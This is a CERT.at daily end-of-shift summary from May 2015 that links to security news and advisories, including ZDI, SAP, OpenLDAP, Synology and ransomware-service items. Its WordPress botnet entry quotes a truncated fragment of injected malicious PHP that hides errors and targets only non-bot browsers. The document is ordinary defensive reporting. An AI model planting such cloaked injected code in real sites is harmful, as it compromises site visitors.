[CERT-daily] Daily summary - Wednesday 27-05-2015

Daily end-of-shift report team at cert.at
Wed May 27 18:32:11 CEST 2015


=======================
= End-of-Shift report =
=======================

Timeframe:   Tuesday 26-05-2015 18:00 - Wednesday 27-05-2015 18:00
Handler:     Stephan Richter
Co-Handler:  n/a




*** This is not the UEFI backdoor you are looking for ***
---------------------------------------------
This is currently the top story on the Linux subreddit. It links to this Tweet which demonstrates using a System Management Mode backdoor to perform privilege escalation under Linux. This is not a story. But first, some background. System Management Mode (SMM) is a feature in most x86 processors since the 386SL back in 1990. It allows for certain events to cause the CPU to stop executing the OS, jump to an area of hidden RAM and execute code there instead, and then hand off back to the OS...
---------------------------------------------
http://mjg59.dreamwidth.org/35110.html




*** Breach detection: Five fatal flaws and how to avoid them ***
---------------------------------------------
When the Sarbanes-Oxley Act of 2002 was passed, it fell on corporate security teams to translate its requirements into technical controls. That threw the IT Security function into the deep end of the ...
---------------------------------------------
http://feedproxy.google.com/~r/HelpNetSecurity/~3/uoHRSOyKltE/article.php




*** Five Mistakes MSSPs Should Avoid ***
---------------------------------------------
MSSPs, or Managed Security Service Providers, are at an exciting point where market acceptance, awareness and demand have converged. I view this as a positive for a potential MSSP but also for the customers and businesses they will protect, enhancing security for everyone. However, excitement and the prospect of profits can create haste, and with haste comes an increased risk of mistakes. In my role at AlienVault, I've been fortunate enough to work with and help ensure the success of a number of...
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/five-mistakes-mssps-should-avoid




*** Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities ***
---------------------------------------------
Docker Hub is a central repository for Docker developers to pull and push container images. We performed a detailed study on Docker Hub images to understand how vulnerable they are to security threats. Surprisingly, we found that more than 30% of official repositories contain images that are highly susceptible to a variety of security attacks (e.g., Shellshock, Heartbleed, Poodle, etc.). For general images...
---------------------------------------------
http://www.banyanops.com/blog/analyzing-docker-hub/




*** Patch now: Synology NAS attackable via photo album ***
---------------------------------------------
Synology's web photo album Photo Station unintentionally grants attackers access to DiskStation NAS systems. Anyone who does not want strangers executing arbitrary code on their NAS should install the vendor's patch now.
---------------------------------------------
http://heise.de/-2668853




*** How to Prevent a Domain Name Theft ***
---------------------------------------------
1. Introduction: Domain names may cost far more than real estate. For instance, Facebook paid USD 8.5 million to buy fb.com. The high prices of domain names attract not only businesses, but also thieves. Domain name theft can be huge trouble for companies because it affects their brand and reputation. This...
---------------------------------------------
http://resources.infosecinstitute.com/how-to-prevent-a-domain-name-theft/




*** SQL injection vulnerability in xt:Commerce ***
---------------------------------------------
Security updates close a vulnerability in the shop software through which attackers could potentially inject database commands.
---------------------------------------------
http://heise.de/-2667569




*** Possible Wordpress Botnet C&C: errorcontent.com, (Tue, May 26th) ***
---------------------------------------------
Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):  #2b8008# /* turn off error reporting */ @ini_set(display_errors /* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT /* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) {
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=19733&rss




*** Researchers Exploit Patched Windows Group Policy Bug ***
---------------------------------------------
Researchers from Core Security were able to exploit a security vulnerability in Windows group policy -- MS15-011 -- that was patched by Microsoft in February.
---------------------------------------------
http://threatpost.com/researchers-exploit-patched-windows-group-policy-bug/113000




*** Online service creates tailor-made crypto-Trojans ***
---------------------------------------------
The barrier to entry for aspiring online extortionists has dropped again: a service on the Tor network creates an individual ransomware Trojan after just a few clicks. If a victim pays the demanded ransom, the operators take a cut.
---------------------------------------------
http://heise.de/-2668860




*** Security: Two new exploits against routers discovered ***
---------------------------------------------
Insecure routers are currently threatened by two malware variants at once. One distributes spam via social media, the other redirects requests to manipulated websites. (Router, Virus)
---------------------------------------------
http://www.golem.de/news/security-zwei-neue-exploits-auf-router-entdeckt-1505-114294-rss.html




*** extjs Arbitrary File Read / ssrf Vulnerability ***
---------------------------------------------
Topic: extjs Arbitrary File Read / ssrf Vulnerability Risk: High Text: Hi all: Baidu Security Team found a vulnerability in extjs, with this vulnerability we can read arbitrary file and request...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2015050162




*** USN-2622-1: OpenLDAP vulnerabilities ***
---------------------------------------------
Ubuntu Security Notice USN-2622-1, 26th May, 2015: openldap vulnerabilities. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04, Ubuntu 14.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS. Summary: OpenLDAP could be made to crash if it received specially crafted network traffic. Software description: openldap - OpenLDAP utilities. Details: It was discovered that OpenLDAP incorrectly handled certain search queries that returned empty attributes. A remote attacker could use this issue to cause...
---------------------------------------------
http://www.ubuntu.com/usn/usn-2622-1/




*** Cisco IP Phone 7861 Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/viewAlert.x?alertId=39011




*** ZDI-15-240: Dell NetVault Backup Heap Buffer Overflow Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell NetVault Backup. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/y6osEWmyti0/




*** ZDI-15-244: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicies Information Disclosure Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/NFGleCbsATc/




*** ZDI-15-243: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicy Information Disclosure Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/OV8j2fD9GSM/




*** ZDI-15-242: Arcserve Unified Data Protection Management Service exportServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/CxxqPV5u-0s/




*** ZDI-15-241: Arcserve Unified Data Protection Management Service reportFileServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/MNmtjnSQ_b4/




*** SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information ***
---------------------------------------------
SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
---------------------------------------------
http://www.securitytracker.com/id/1032402




*** Security Advisory: Point-to-Point Protocol (PPP) vulnerability CVE-2015-3310 ***
---------------------------------------------
(SOL16686)
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/16000/600/sol16686.html?ref=rss




*** lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries ***
---------------------------------------------
lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries
---------------------------------------------
http://www.securitytracker.com/id/1032405




*** Rockwell Automation RSView32 Weak Encryption Algorithm on Passwords ***
---------------------------------------------
This advisory was originally posted to the US-CERT secure Portal library on May 12, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for a password encryption vulnerability in RSView32.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-132-02




*** Thycotic Password Manager Secret Server iOS Application MITM ***
---------------------------------------------
Topic: Thycotic Password Manager Secret Server iOS Application MITM Risk: Medium Text: Thycotic Password Manager Secret Server iOS Application - MITM SSL Certificate Vulnerability -- http://www.info-sec.ca/adviso...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2015050167

